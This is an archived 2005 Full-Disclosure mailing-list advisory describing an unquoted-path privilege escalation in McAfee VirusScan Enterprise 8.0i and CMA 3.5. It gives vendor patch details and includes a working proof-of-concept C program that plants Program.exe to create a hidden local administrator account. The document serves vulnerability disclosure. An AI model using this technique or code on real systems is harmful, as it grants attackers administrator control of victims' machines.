lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <80115b690512220913m26a1d71eia3ca4e6e9ef52042@mail.gmail.com>
Date: Thu Dec 22 18:12:31 2005
From: reedarvin at gmail.com (Reed Arvin)
Subject: Privilege escalation in McAfee VirusScan
	Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)

( Original article: http://reedarvin.thearvins.com/20051222-01.html )

Summary:
Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA
3.5 (patch 5) (http://www.mcafee.com/)

Details:
By default the naPrdMgr.exe process runs under the context of the Local
System account. Every so often it will run through a process where it does
the following:

- Attempts to run \Program Files\Network Associates\VirusScan\EntVUtil.EXE
- Reads C:\Program Files\Common Files\Network Associates\Engine\SCAN.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\NAMES.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\CLEAN.DAT

The issue occurs when the naPrdMgr.exe process attempts to run the
C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE file. Because of
a lack of quotes the naPrdMgr.exe process first tries to run C:\Program.exe.
If that is not found it tries to run C:\Program Files\Network.exe. When that
is not found it finally runs the EntVUtil.EXE file that it was originally
intending to run. A malicious user can create an application named
Program.exe and place it on the root of the C:\ and it will be run with
Local System privileges by the naPrdMgr.exe process. Source code for an
example Program.exe is listed below.

Vulnerable Versions:
McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)

Patches/Workarounds:
The vendor has released knowledge base article kb45256 to address the issue.

Solution one from the vendor:
"This issue is resolved in Patch 12."

Solution two from the vendor:
"The VirusScan Enterprise plugin VSPLUGIN.DLL has been updated to resolve
the potential exploit. The new plugin is available as a HotFix from McAfee
Tier III Technical Support."

Exploits:

// ===== Start Program.c ======
#include <windows.h>
#include <stdio.h>

INT main( VOID )
{
    CHAR  szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

    GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

    printf( "Creating user \"Program\" with password \"Pr0gr@m$$\"...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe user Program Pr0gr@m$$
/add", szWinDir );

    system( szCmdLine );

    printf( "Adding user \"Program\" to the local Administrators group...\n"
);

    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators
Program /add", szWinDir );

    system( szCmdLine );

    return 0;
}
// ===== End Program.c ======

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051222/b164df31/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ